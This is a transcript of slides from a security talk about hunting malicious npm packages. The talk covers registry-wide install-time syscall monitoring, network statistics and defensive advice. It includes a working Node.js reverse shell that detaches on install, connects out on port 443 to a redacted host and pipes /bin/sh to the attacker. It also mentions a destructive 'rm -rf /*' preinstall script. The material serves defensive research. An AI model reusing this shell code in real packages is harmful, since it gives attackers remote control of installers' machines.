hunting for malicious modules in npm - nodesummit
TRANSCRIPT
Hunting for Malicious Modules in npm
adam_baldwin / evilpacket
liftsecurity.io
nodesecurity.io: Continuous Security Monitoring
WHY SHOULD WE HUNT?
🕯 Hey, I can publish malicious code to npm
💨 this is bad.
🔥 install scripts are BAD!
💩 JavaScript BAD!
rimrafall (a 2015 package whose preinstall script ran rm -rf /*)
npm hydra worm (a 2016 self-replicating package that used the installing user's npm credentials to republish itself into that user's other packages)
WHAT ARE WE HUNTING?
WHAT DEFINES MALICIOUS BEHAVIOR?
😈 Example: a reverse shell. On install the module detaches itself, connects out to port 443 (so the traffic blends in with HTTPS), wires /bin/sh to the socket, and reconnects every five seconds if the connection drops:

```javascript
var net = require('net');
var spawn = require('child_process').spawn;

function c() {
  var client = new net.Socket();
  client.connect(443, "REDACTED", function() {
    var sh = spawn('/bin/sh', []);
    client.write("Connected\r\n");
    client.pipe(sh.stdin);    // attacker input -> shell
    sh.stdout.pipe(client);   // shell output -> attacker
  });
  client.on('error', function() {});                         // fail silently
  client.on('close', function() { setTimeout(c, 5000); });   // retry every 5s
}

require('daemon')();   // detach from the npm install process and keep running
c();
```

The tell is the pair `client.connect(443, "REDACTED", ...)` followed by `spawn('/bin/sh', [])`: an outbound connection that is immediately handed a shell.
WHERE ARE WE HUNTING?
507,573 modules
3,443,784 individual versions
242,505,822 individual files
21,756 modules with install scripts
HOW AM I HUNTING?
MIRROR REGISTRY
INDEX MODULES: filenames, extensions, content hash
npm install module -> syscall capture -> DB
npm publish -> GCS -> PubSub -> Instrumentation -> npm i -> raw data 🎉
~24,000 modules processed
2.1 TB OF DATA 😲
DESTINATION PORTS (observed during installs)
22, 53, 80, 443, 1880, 3000, 3001, 3306, 4987, 6379, 8000, 8002, 8008, 8043, 8080, 8090, 9000, 9001, 9418, 23400, 27017, 38584, 54329, 61337
(22 ssh, 53 dns, 80/443 http/https, 3306 mysql, 6379 redis, 9418 git, 27017 mongodb are well-known service ports)
DNS REQUESTS: 339 unique lookups
DESTINATION HOSTS: 1080 unique hosts
RESULTS 😈
Insecure behavior: 144+ modules that download build components over HTTP
Modules that called home: et_phone_home, anarchy, harmlesspackage, botbait
Modules that change registry settings
😇 ? 😈
😢 / 😀
WHAT DID I LEARN? How can we improve the future?
People will publish malicious things to the registry
Your security habits have a lot to do with whether this gets exploited or not
- Have good passwords
- Don't publish credentials
- Limit the number of publishers
But what about npm? Can't they do something?
Thanks
adam_baldwin / evilpacket